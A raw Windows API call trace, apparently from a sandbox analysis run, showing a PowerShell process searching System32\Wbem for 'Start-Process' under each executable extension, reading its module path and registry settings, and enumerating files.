	[0058.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.COM", lpFilePart=0x0) returned 0x2a
	[0058.180] GetFullPathNameW (in: lpFileName="Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.COM", lpFilePart=0x0) returned 0x2b
	[0058.180] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.COM", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.EXE", lpFilePart=0x0) returned 0x2a
	[0058.180] GetFullPathNameW (in: lpFileName="Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.EXE", lpFilePart=0x0) returned 0x2b
	[0058.180] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.EXE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.BAT", lpFilePart=0x0) returned 0x2a
	[0058.181] GetFullPathNameW (in: lpFileName="Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.BAT", lpFilePart=0x0) returned 0x2b
	[0058.181] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.BAT", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.CMD", lpFilePart=0x0) returned 0x2a
	[0058.183] GetFullPathNameW (in: lpFileName="Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CMD", lpFilePart=0x0) returned 0x2b
	[0058.183] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.CMD", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.183] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.VBS", lpFilePart=0x0) returned 0x2a
	[0058.183] GetFullPathNameW (in: lpFileName="Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBS", lpFilePart=0x0) returned 0x2b
	[0058.183] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.VBS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.VBE", lpFilePart=0x0) returned 0x2a
	[0058.184] GetFullPathNameW (in: lpFileName="Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBE", lpFilePart=0x0) returned 0x2b
	[0058.184] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.VBE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.JS", lpFilePart=0x0) returned 0x29
	[0058.185] GetFullPathNameW (in: lpFileName="Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JS", lpFilePart=0x0) returned 0x2a
	[0058.185] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.JS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.JSE", lpFilePart=0x0) returned 0x2a
	[0058.186] GetFullPathNameW (in: lpFileName="Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JSE", lpFilePart=0x0) returned 0x2b
	[0058.186] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.JSE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.WSF", lpFilePart=0x0) returned 0x2a
	[0058.186] GetFullPathNameW (in: lpFileName="Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSF", lpFilePart=0x0) returned 0x2b
	[0058.187] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.WSF", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.WSH", lpFilePart=0x0) returned 0x2a
	[0058.187] GetFullPathNameW (in: lpFileName="Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSH", lpFilePart=0x0) returned 0x2b
	[0058.187] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.WSH", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.MSC", lpFilePart=0x0) returned 0x2a
	[0058.188] GetFullPathNameW (in: lpFileName="Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.MSC", lpFilePart=0x0) returned 0x2b
	[0058.188] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.MSC", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.194] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.194] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.194] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.194] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18df38 | out: phkResult=0x184c18df38*=0x898) returned 0x0
	[0058.194] RegQueryValueExW (in: hKey=0x898, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18df88, lpData=0x0, lpcbData=0x184c18df80*=0x0 | out: lpType=0x184c18df88*=0x1, lpData=0x0, lpcbData=0x184c18df80*=0x56) returned 0x0
	[0058.194] RegQueryValueExW (in: hKey=0x898, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18df88, lpData=0x150476e94b0, lpcbData=0x184c18df80*=0x56 | out: lpType=0x184c18df88*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18df80*=0x56) returned 0x0
	[0058.194] RegCloseKey (hKey=0x898) returned 0x0
	[0058.200] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.200] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.200] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.201] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.202] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.204] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.205] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.206] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
	[0058.207] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 1
